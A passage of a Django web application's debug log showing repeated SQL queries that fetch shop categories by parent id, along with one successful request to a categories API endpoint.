"shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 05:48:55,084 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 05:48:55,089 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 05:48:55,092 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 05:48:55,094 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 05:48:55,096 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 05:48:55,099 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 05:48:55,102 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 05:48:55,106 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 05:48:55,109 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 05:48:55,112 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 05:48:55,115 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 05:48:55,119 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 05:48:55,124 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 05:48:55,128 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 05:48:55,132 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 05:48:55,135 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 05:48:55,139 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 05:48:55,144 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 05:48:55,147 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 05:48:55,150 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 05:48:55,154 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 05:48:55,157 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 05:48:55,163 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 05:48:55,167 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 05:48:55,171 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 05:48:55,174 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 05:48:55,178 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 05:48:55,182 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 05:48:55,187 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 05:48:55,190 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 05:48:55,194 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 05:48:55,199 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 05:48:55,202 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 05:48:55] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 05:49:40,764 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 05:49:40,775 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 05:49:40,781 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 05:49:40,784 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 05:49:40,789 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 05:49:40,792 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 05:49:40,796 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 05:49:40,800 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 05:49:40,804 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 05:49:40,809 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 05:49:40,812 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 05:49:40,815 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 05:49:40,819 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 05:49:40,822 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 05:49:40,827 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 05:49:40,830 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 05:49:40,834 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 05:49:40,837 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 05:49:40,841 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 05:49:40,846 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 05:49:40,850 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 05:49:40,853 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 05:49:40,856 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 05:49:40,860 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 05:49:40,863 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 05:49:40,869 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 05:49:40,872 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 05:49:40,875 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 05:49:40,879 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 05:49:40,882 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 05:49:40,887 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 05:49:40,891 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 05:49:40,894 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 05:49:40,897 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 05:49:40,901 utils 4252 140031503103744 